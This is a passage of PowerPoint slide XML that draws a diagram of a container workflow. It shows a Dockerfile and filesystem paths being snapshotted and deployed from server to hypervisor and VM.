                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2594B10-E204-D44E-8A8E-0D0881538B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492276" y="1775881"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25235C6-2A13-9044-ABC0-AE029CF536D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016685" y="1775881"/>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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Elbow Connector 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B510A9A-1D5A-EF41-B231-772D3AED62E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="0"/>
            <a:endCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4646399" y="2614576"/>
            <a:ext cx="144648" cy="1"/>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ED4E15C7-6DCC-E64A-B87E-582F3615C215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="39" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4381434" y="1894101"/>
            <a:ext cx="144647" cy="529933"/>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EE6F84AD-B8F3-394B-A73F-2261C3A6A41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4645094" y="2157759"/>
            <a:ext cx="144647" cy="2614"/>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0E2884DD-9536-8A45-AA60-B362AB1E8F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="43" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4907298" y="1898168"/>
            <a:ext cx="144647" cy="521796"/>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68" name="Right Arrow 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D1DC15-B99E-BA4E-9236-4AC8B41645A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1937839" y="1811204"/>
            <a:ext cx="1683692" cy="1055461"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>SNAPSHOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E133333A-A7E7-3E48-A0C4-FCD868DB7C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885190" y="1637875"/>
            <a:ext cx="1661834" cy="147459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endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D151BA6A-68A6-1E4D-924A-938B82C2D5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624709" y="3908425"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER X</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E164A9-EA70-3142-B404-C36C2BC5B38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624711" y="3360388"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>HYPERVISOR</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="Elbow Connector 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78235102-BC29-2E44-97BA-78B90CDE01E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="70" idx="0"/>
            <a:endCxn id="71" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6588186" y="3788419"/>
            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Right Arrow 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF4787F-2F83-9341-89FD-57F9C93F2160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5773474" y="1760038"/>
            <a:ext cx="1683692" cy="1055461"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>DEPLOY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF0F4ED-DEBC-0144-A0D6-BF168CCA961F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045724" y="4286269"/>
            <a:ext cx="1356592" cy="487490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>LOCATION A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{098154AC-FCBC-864B-B112-F9B7F366F1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722678" y="2724806"/>
            <a:ext cx="994550" cy="308025"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Y</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F8A4FC-EF7C-A341-BDCB-2B62C0E28A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466186" y="1813788"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E63C186-A7B4-3A46-928C-FF42BA3CFD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878838" y="2269297"/>
            <a:ext cx="682226"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E14E01-7929-F94D-BAE7-82AE66ACFA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7993505" y="1813788"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00975B18-EFE7-F146-9781-1DF6BAAC3A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8517915" y="1813788"/>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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="80" name="Elbow Connector 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09F528C3-C925-B84C-B931-45466EA52A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="0"/>
            <a:endCxn id="77" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8147628" y="2652482"/>
            <a:ext cx="144648" cy="1"/>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ED71AD9A-0375-D946-9E86-210E6AA5E5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="76" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7882664" y="1932007"/>
            <a:ext cx="144647" cy="529933"/>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2" name="Elbow Connector 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4131077D-0D1A-0147-AD92-300EE4C18870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="78" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8146323" y="2195667"/>
            <a:ext cx="144647" cy="2614"/>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8626A9CB-465B-B945-AF4C-50BDFED931DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="79" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8408528" y="1936075"/>
            <a:ext cx="144647" cy="521796"/>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4" name="Elbow Connector 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30C8598-C511-754B-9177-921A2C2C56A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="71" idx="0"/>
            <a:endCxn id="75" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7300295" y="2440731"/>
            <a:ext cx="327557" cy="1511759"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="2222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1264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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379816" y="2234227"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640538" y="3908425"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640540" y="3360388"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
